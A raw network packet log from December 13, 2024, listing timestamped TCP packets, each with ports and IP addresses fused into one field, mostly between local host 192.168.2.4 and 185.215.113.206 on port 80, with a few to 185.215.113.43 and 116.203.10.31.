                                                                                                                                                                                                                                                Dec 13, 2024 13:52:49.962171078 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.019829988 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.019853115 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.020385027 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.020540953 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.021728039 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.021802902 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.023053885 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.023200035 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.024422884 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.024513006 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.025751114 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.025856018 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.027255058 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.027344942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.028439999 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.028537035 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.029789925 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.029906988 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.030750990 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.030839920 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.030857086 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.031125069 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.031213045 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.031243086 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.031327009 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.032479048 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.032524109 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.032527924 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.032562017 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.033804893 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.033895969 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.035149097 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.035269022 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.036494970 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.036518097 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.036581993 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.036617994 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.036657095 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.037847042 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.038031101 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.039194107 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.039319038 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.040702105 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.040771961 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.041377068 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.041897058 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.042006969 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.042030096 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.042121887 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.043307066 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.043412924 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.044616938 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.044704914 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.045932055 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.046075106 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.047311068 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.050842047 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.064193964 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.064260006 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.064269066 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.064397097 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.106213093 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.106301069 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.106784105 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.107733011 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.107825994 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.108378887 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.111341000 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.123641014 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.123764992 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.131726027 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.147424936 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.147777081 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.147893906 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.148073912 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.148139954 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.149343014 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.149507999 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.149570942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.150831938 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.151005983 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.151094913 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.152278900 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.152327061 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.154268026 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.154402018 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.154947996 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.156651020 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.156722069 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.157285929 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.157753944 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.157928944 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.158735991 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.162199974 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.162328959 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.197917938 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.198000908 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.198576927 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.211579084 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.211602926 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.212312937 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.239479065 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.239516973 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.239905119 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.240926981 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.240974903 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.241677999 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.252485037 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.280781984 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.280797958 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.280973911 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.281363964 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.281384945 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.282573938 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.282773972 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.282787085 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.283965111 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.284079075 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.284159899 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.284934998 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.285481930 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.285559893 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.286711931 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.288614988 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.288717031 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.289180994 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.290040016 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.290149927 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.290678024 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.291004896 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.291125059 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.292790890 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.292957067 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.292995930 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.295165062 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.300051928 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.300390005 CET4983880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.300765038 CET4987080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.334342957 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.334520102 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.334897995 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.338406086 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.373955011 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.374022961 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.374108076 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.374648094 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.375324011 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.375505924 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.376313925 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.376481056 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.376492977 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.377562046 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.378602028 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.378623962 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.378797054 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413126945 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413167953 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413494110 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413724899 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413863897 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413899899 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413935900 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.413963079 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.414048910 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.415170908 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.415400982 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.415575981 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.419332027 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.419346094 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.419359922 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.419374943 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.419387102 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.419403076 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.420418024 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.421873093 CET8049870185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.422046900 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.422228098 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.422714949 CET8049838185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.422728062 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.423365116 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.423382044 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.424345016 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.424968958 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.424983978 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.425781965 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.433669090 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.443810940 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.444046974 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.444046974 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.444058895 CET4983880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.444165945 CET4987080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.445488930 CET4987080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.467473984 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.467617035 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.468043089 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.474102020 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.507903099 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.508064032 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.508558989 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.508630037 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.509459972 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.509577990 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.510775089 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.514647007 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.526281118 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.526313066 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.534732103 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.546457052 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.546650887 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.546693087 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.546853065 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.547111034 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.547157049 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.547439098 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.547511101 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.547667980 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.548497915 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.548599958 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.548612118 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.548666954 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.548693895 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.548930883 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.549921989 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.550995111 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.551166058 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.551637888 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.552531004 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.552639008 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.553231001 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.554929018 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.556077003 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.556241035 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.556723118 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.557600975 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.557729959 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.558216095 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.558892965 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.559032917 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.559547901 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.559607983 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.559854984 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.564419031 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.564481020 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.564492941 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.564582109 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.565440893 CET8049870185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.588064909 CET49873443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.588099003 CET44349873116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.591691017 CET49873443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.592098951 CET49873443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.592113972 CET44349873116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.600792885 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.600959063 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.601389885 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.601831913 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.641215086 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.641602039 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.641849041 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.642011881 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.642206907 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.643332958 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.643491983 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.643616915 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.644830942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.646261930 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.646409988 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.680583954 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.680663109 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.681132078 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.681417942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.681543112 CET8049848185.215.113.206192.168.2.4
